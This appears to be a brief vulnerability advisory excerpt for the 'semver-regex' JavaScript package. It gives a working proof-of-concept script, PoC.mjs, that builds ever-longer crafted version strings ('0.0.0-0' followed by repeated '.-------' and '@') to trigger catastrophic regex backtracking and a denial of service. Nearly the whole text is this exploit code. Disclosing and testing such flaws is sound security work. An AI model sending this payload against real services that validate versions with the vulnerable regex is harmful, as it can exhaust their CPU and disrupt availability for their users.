It allows cause a denial of service when formatting crafted invalid semver versions.
// PoC.mjs
import semverRegex from 'semver-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '0.0.0-0' + '.-------'.repeat(i*1) + '@';
semverRegex().test(attack_str );
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}